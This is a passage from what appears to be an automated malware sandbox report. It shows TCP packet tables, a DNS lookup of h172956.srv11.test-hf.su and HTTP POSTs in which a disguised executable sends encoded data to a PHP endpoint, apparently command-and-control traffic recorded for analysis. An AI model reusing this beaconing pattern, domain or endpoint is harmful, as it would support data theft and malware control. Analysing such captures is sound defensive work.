                                                                    Mar 5, 2024 22:28:49.596323013 CET804981291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:49.599136114 CET4981280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:49.803162098 CET4981280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:50.013794899 CET804981291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:50.013828039 CET804981291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:50.014149904 CET4981280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:50.225476980 CET804981291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:50.252248049 CET804981291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:50.294962883 CET4981280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:51.731623888 CET4981280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:51.732290030 CET4981380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:51.939145088 CET804981391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:51.939251900 CET4981380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:51.939429998 CET4981380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:51.941284895 CET804981291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:51.941364050 CET4981280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:52.146282911 CET804981391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:52.146306992 CET804981391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:52.146541119 CET4981380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:52.353187084 CET804981391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:52.382245064 CET804981391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:52.435566902 CET4981380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:52.509867907 CET4981380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:52.510826111 CET4981480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:52.716739893 CET804981391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:52.716840029 CET4981380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:52.717992067 CET804981491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:52.718096972 CET4981480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:52.718271017 CET4981480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:52.925255060 CET804981491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:52.925309896 CET804981491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:52.925548077 CET4981480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.132781982 CET804981491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.156841993 CET804981491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.201406002 CET4981480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.276433945 CET4981480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.277246952 CET4981580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.374526978 CET4981680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.483683109 CET804981491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.483841896 CET4981480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.484149933 CET804981591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.484200001 CET4981580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.495294094 CET4981780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.581525087 CET804981691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.581631899 CET4981680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.581808090 CET4981680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.705189943 CET804981791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.705284119 CET4981780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.705435991 CET4981780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.788698912 CET804981691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.788778067 CET804981691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.788966894 CET4981680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.915730953 CET804981791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.915766001 CET804981791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:53.915968895 CET4981780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:53.995938063 CET804981691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.022955894 CET804981691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.076200962 CET4981680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.126194000 CET804981791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.153639078 CET804981791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.201220036 CET4981780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.290172100 CET4981680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.290215969 CET4981780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.291268110 CET4981880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.498436928 CET804981691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.498579025 CET4981680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.501096010 CET804981791.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.501158953 CET4981780192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.502656937 CET804981891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.502744913 CET4981880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.502968073 CET4981880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.713692904 CET804981891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.713726997 CET804981891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.713985920 CET4981880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:54.924794912 CET804981891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.951894045 CET804981891.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:54.998279095 CET4981880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:55.079164982 CET4981980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:55.289858103 CET804981991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:55.289978981 CET4981980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:55.290255070 CET4981980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:55.500874043 CET804981991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:55.500909090 CET804981991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:55.501285076 CET4981980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:55.711931944 CET804981991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:55.739537001 CET804981991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:55.795043945 CET4981980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:55.856482029 CET4981980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:55.857557058 CET4982080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.066575050 CET804982091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:56.066716909 CET804981991.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:56.066761017 CET4982080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.066792965 CET4981980192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.067059040 CET4982080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.275903940 CET804982091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:56.275928020 CET804982091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:56.276189089 CET4982080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.485734940 CET804982091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:56.512701988 CET804982091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:56.560678005 CET4982080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.635571957 CET4982080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.636162996 CET4982180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.844788074 CET804982091.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:56.845177889 CET4982080192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.848808050 CET804982191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:56.849426031 CET4982180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:56.849678040 CET4982180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:57.062197924 CET804982191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:57.062222004 CET804982191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:57.063110113 CET4982180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:57.275904894 CET804982191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:57.302175045 CET804982191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:57.357455015 CET4982180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:57.422378063 CET4981880192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:57.427336931 CET4982180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:57.428467989 CET4982280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:57.639874935 CET804982191.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:57.639974117 CET4982180192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:57.641093969 CET804982291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:57.641273022 CET4982280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:57.641391993 CET4982280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:57.854453087 CET804982291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:57.854506969 CET804982291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:57.854836941 CET4982280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.069490910 CET804982291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:58.094347000 CET804982291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:58.138757944 CET4982280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.212649107 CET4982280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.213547945 CET4982380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.425358057 CET804982391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:58.425421000 CET804982291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:58.425460100 CET4982380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.425604105 CET4982280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.425725937 CET4982380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.637275934 CET804982391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:58.637345076 CET804982391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:58.637620926 CET4982380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.849792957 CET804982391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:58.874694109 CET804982391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:58.919960022 CET4982380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.995800972 CET4982380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:58.998117924 CET4982480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.031006098 CET4982580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.155435085 CET4982680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.207623959 CET804982391.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.207940102 CET4982380192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.209381104 CET804982491.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.209448099 CET4982480192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.240909100 CET804982591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.241012096 CET4982580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.241233110 CET4982580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.368105888 CET804982691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.368331909 CET4982680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.368438005 CET4982680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.450999022 CET804982591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.451145887 CET804982591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.451585054 CET4982580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.581120014 CET804982691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.581146002 CET804982691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.623107910 CET4982680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:28:59.661711931 CET804982591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.686433077 CET804982591.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:28:59.732566118 CET4982580192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:29:19.033802986 CET804974291.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:29:19.033914089 CET4974280192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:29:27.380537987 CET4982680192.168.2.591.227.16.11
                                                                    Mar 5, 2024 22:29:27.593740940 CET804982691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:29:27.634310007 CET804982691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:29:27.763983965 CET804982691.227.16.11192.168.2.5
                                                                    Mar 5, 2024 22:29:27.810509920 CET4982680192.168.2.591.227.16.11

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 5, 2024 22:27:37.762108088 CET6117453192.168.2.51.1.1.1
                                                                    Mar 5, 2024 22:27:38.585751057 CET53611741.1.1.1192.168.2.5

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Mar 5, 2024 22:27:37.762108088 CET192.168.2.51.1.1.10xe9a9Standard query (0)h172956.srv11.test-hf.suA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Mar 5, 2024 22:27:38.585751057 CET1.1.1.1192.168.2.50xe9a9No error (0)h172956.srv11.test-hf.su91.227.16.11A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • h172956.srv11.test-hf.su

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.54971291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:38.801529884 CET347OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 344
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:39.008857965 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:39.009859085 CET344OUTData Raw: 05 07 01 02 06 0e 01 07 05 06 02 01 02 03 01 05 00 00 05 01 02 0d 03 00 00 0f 0d 04 04 0f 01 09 0c 02 04 5a 03 05 06 52 0d 06 06 06 05 0a 06 0e 04 06 0f 00 0a 0f 04 00 04 01 04 0c 06 56 04 08 05 00 0d 0f 05 0f 01 08 0c 0f 0b 07 0d 04 0d 51 06 0d
                                                                    Data Ascii: ZRVQQPQR\L}Sk^rc\iBv[pRit|wXkpkXxBcJlYbI}n`@tw^}_~V@{SzbW
                                                                    Mar 5, 2024 22:27:39.332370996 CET1286INHTTP/1.1 200 OK
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    Vary: Accept-Encoding
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt
                                                                    Data Raw: 35 35 38 0d 0a 56 4a 7d 5d 78 6e 7f 03 6c 62 5a 48 68 58 7c 5f 7d 77 6c 50 68 60 7e 54 7a 60 6c 4d 69 5b 60 00 63 5a 61 0b 7a 5f 79 07 62 66 56 07 7d 71 78 01 55 4b 72 53 74 72 70 59 7f 4c 7a 59 7d 77 5f 54 78 5f 6b 52 7d 73 56 58 61 61 71 04 63 5f 53 03 7c 62 75 59 7e 6c 7f 55 7d 59 63 07 75 5c 7b 06 7c 5c 6d 48 69 73 71 49 7b 77 5e 04 79 77 78 07 78 6d 63 02 6e 5b 64 00 6c 63 7a 04 7f 60 63 59 78 49 7c 07 7e 5c 77 02 76 4f 56 02 7a 51 41 5b 68 77 56 0b 7f 61 5f 43 75 52 6b 5e 78 42 7f 5a 77 60 7e 0c 7a 5f 7d 03 7e 52 5f 5a 6f 61 5f 58 62 73 67 49 61 62 60 04 60 61 76 50 7e 5d 7a 06 77 04 7d 06 76 65 5e 09 7e 7c 66 58 60 6f 7f 5d 7c 70 7c 00 78 6f 7f 03 7b 5e 66 00 6b 6d 68 08 74 64 7c 04 7e 62 53 50 69 6e 63 08 7a 6e 66 07 69 5b 65 04 7b 5d 46 51 6b 52 6b 52 6a 5e 68 09 6a 49 61 59 6c 43 74 5a 7b 72 52 48 7c 5f 5a 5a 69 74 7b 42 7c 06 75 4f 6e 5a 7f 5d 7e 61 78 49 63 63 53 51 7b 5c 79 03 76 66 70 02 7e 48 68 07 7d 58 5b 40 76 72 73 49 7c 72 75 01 7c 77 7a 41 7b 58 68 0c 7d 73 67 4a 76 72 61 05 74 61 5b 00 7c 4f 58 00 7e 52 5e 0c 7e 59 67 44 76 71 7f 04 7b 62 6d 04 7c 70 75 44 78 59 60 4d 7b 77 78 07 79 7d 51 05 79 72 64 02 78 5d 72 4f 7c 60 52 4b 79 67 7c 07 7c 62 5d 4f 76 4f 6c 4a 7d 7c 7f 03 7c 59 52 0d 7f 4f 5f 0c 75 42 5a 06 78 7c 52 05 76 70 76 0c 79 5f 7d 49 7c 7c 7e 06 7b 4f 66 04 76 63 77 4b 77 61 64 07 74 4f 7a 0d 7c 60 72 04 77 5c 6d 06 77 75 60 0b 7c 7c 75 4c 77 52 5e 07 7e 63 52 49 79 6c 6f 48 7b 5e 54 4b 7f 53 74 4e 74 59 6c 07 7e 72 72 0d 7d 53 63 42 7b 53 7e 02 7d 62 53 05 7c 60 68 41 7d 6c 74 0a 7e 4e 78 40 7c 77 76 43 7b 43 67 03 78 5c 60 02 7c 71 7f 00 7e 67 5d 4f 7c 70 5b 0d 79 4d 5a 4f 7f 62 64 04 76 73 71 40 79 71 71 4b 75 66 56 07 7e 66 74 05 7e 76 7d 42 77 4c 55 44 7c 72 75 05 7c 49 6a 4e 7b 66 60 4f 7d 4d 7b 03 76 72 75 03 77 4f 5b 01 7c 4f 7a 00 7d 52 78 40 7e 77 67 03 76 5f 73 01 7a 72 75 04 7d 60 79 49 78 67 5e 4c 7b 59 5e 4d 7b 7d 59 03 7a 5c 60 05 78 5d 7e 4e 7b 5d 4e 5a 78 01 70 44 7e 72 67 02 77 71 74 49 7e 0a 63 45 7f 67 55 55 7c 61 79 43 76 7c 5d 5b 7b 52 6b 5a 63 5e 7e 4e 6d 07 66 58 7e 42 66 5f 7a 5c 79 05 5c 07 0f 7d 62 60 67 7b 5a 4c 7e 4a 78 5e 50 04 76 72 53 4d 62 66 73 51 7f 42 75 4c 63 7c 6c 4c 7e 70 7c 44 79 6f 60 58 7a 70 62 44 68 7d 5e 08 74 77 52 4c 7d 5b 7a 0a 7a 53 59 51 63 7e 0e 45 52 05 54 79 56 63 49 08 53 6e 6f 4c 51 6c 6b 54 50 5d 79 5c 57 7a 7b 40 7f 5c 6b 5c 7f 72 77 02 7c 67 7b 08 7c 60 66 52 6d 5a 74 42 7f 72 5d 59 76 70 62 51 6d 07 7e 5f 75 00 7f 5e 7e 5f 64 40 7d 75 7d 0c 70 5c 42 04 7b 5b 54 59 50 00 71 4a 52 65 5d 48 51 5b 0b 49 62 6e 7e 07 63 6d 76 00 78 5f 5c 58 7d 6c 60 09 7c 59 77 01 74 5f 77 05 78 5f 0c 49 7e 70 75 5a 7a 70 73 5a 6c 64 00 42 54 71 64 5f 56 61 00 57 6c 05 5b 06 57 67 70 05 7f 58 00 5f 57 4f 74 6d 5a 06 7f 42 7a 51 41 5b 68 01 67 4e 51 72 4c 08 62 0a 55 43 6d 0b 7b 5d 63 06 5b 4f 56 5c 7d 06 7a 53 06 5a 51 4c 71 6b 5a 04 7c 41 71 5c 42 5f 63 07 61 4f 52 73 4b 06 63 04 54 40 60 02 73 54 6b 0a 5c 43 5b 53 77 43 6b 70 6c 5a 79 51 7c 7d 62 67 7a 40 7b 54 5d 55 5b 00 7b 45 54 61 53 48 51 55 0f 41 6f 6e 53 46 52
                                                                    Data Ascii: 558VJ}]xnlbZHhX|_}wlPh`~Tz`lMi[`cZaz_ybfV}qxUKrStrpYLzY}w_Tx_kR}sVXaaqc_S|buY~lU}Ycu\{|\mHisqI{w^ywxxmcn[dlcz`cYxI|~\wvOVzQA[hwVa_CuRk^xBZw`~z_}~R_Zoa_XbsgIab``avP~]zw}ve^~|fX`o]|p|xo{^fkmhtd|~bSPincznfi[e{]FQkRkRj^hjIaYlCtZ{rRH|_ZZit{B|uOnZ]~axIccSQ{\yvfp~Hh}X[@vrsI|ru|wzA{Xh}sgJvrata[|OX~R^~YgDvq{bm|puDxY`M{wxy}Qyrdx]rO|`RKyg||b]OvOlJ}||YRO_uBZx|Rvpvy_}I||~{OfvcwKwadtOz|`rw\mwu`||uLwR^~cRIyloH{^TKStNtYl~rr}ScB{S~}bS|`hA}lt~Nx@|wvC{Cgx\`|q~g]O|p[yMZObdvsq@yqqKufV~ft~v}BwLUD|ru|IjN{f`O}M{vruwO[|Oz}Rx@~wgv_szru}`yIxg^L{Y^M{}Yz\`x]~N{]NZxpD~rgwqtI~cEgUU|ayCv|][{RkZc^~NmfX~Bf_z\y\}b`g{ZL~Jx^PvrSMbfsQBuLc|lL~p|Dyo`XzpbDh}^twRL}[zzSYQc~ERTyVcISnoLQlkTP]y\Wz{@\k\rw|g{|`fRmZtBr]YvpbQm~_u^~_d@}u}p\B{[TYPqJRe]HQ[Ibn~cmvx_\X}l`|Ywt_wx_I~puZzpsZldBTqd_VaWl[WgpX_WOtmZBzQA[hgNQrLbUCm{]c[OV\}zSZQLqkZ|Aq\B_caORsKcT@`sTk\C[SwCkplZyQ|}bgz@{T]U[{ETaSHQUAonSFR
                                                                    Mar 5, 2024 22:27:39.332385063 CET361INData Raw: 04 05 78 6b 63 00 54 7b 52 56 50 64 59 67 0b 7a 75 5b 42 56 54 41 5a 7a 75 7b 5f 6b 62 0b 44 51 7b 60 56 50 63 05 5e 6d 05 00 04 52 58 67 48 5c 62 7e 4e 6e 72 65 5a 77 5b 7b 64 66 4b 78 44 79 5f 5c 54 5b 05 70 40 56 61 54 45 50 5f 0a 53 54 01 6f
                                                                    Data Ascii: xkcT{RVPdYgzu[BVTAZzu{_kbDQ{`VPc^mRXgH\b~NnreZw[{dfKxDy_\T[p@VaTEP_SToMWxl[~BcfqxYeDQ`gUjppg\rtonuYwr]ldCT{o[WnWnDQp[ChcgXieq^rzQA[hgNQrLbUCmG[ZeIVXbEW}^WbfXw^||ZXvu{SceNXav]qXNQkfCZAkUFnNZQs_VnkUpYV_
                                                                    Mar 5, 2024 22:27:39.332436085 CET5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0
                                                                    Mar 5, 2024 22:27:39.390825033 CET323OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 384
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:39.597853899 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:39.598098993 CET384OUTData Raw: 54 50 51 5c 5e 5c 50 50 5e 57 5a 51 57 50 50 5b 54 52 54 59 56 5f 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPQ\^\PP^WZQWPP[TRTYV_WXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D,:036$6X/)$831_;!Z<6 '42<,%Z"!Q*
                                                                    Mar 5, 2024 22:27:39.830224991 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt
                                                                    Mar 5, 2024 22:27:39.903587103 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1908
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:40.110676050 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:40.110918045 CET1908OUTData Raw: 54 5e 54 5d 5e 59 55 50 5e 57 5a 51 57 59 50 59 54 5c 54 59 56 5b 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T^T]^YUP^WZQWYPYT\TYV[WUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C/-305$%>X/?>X'2:,W5#"/($?&<"]/%Z"!Q*!
                                                                    Mar 5, 2024 22:27:40.343519926 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt
                                                                    Mar 5, 2024 22:27:40.485521078 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:40.692538023 CET25INHTTP/1.1 100 Continue
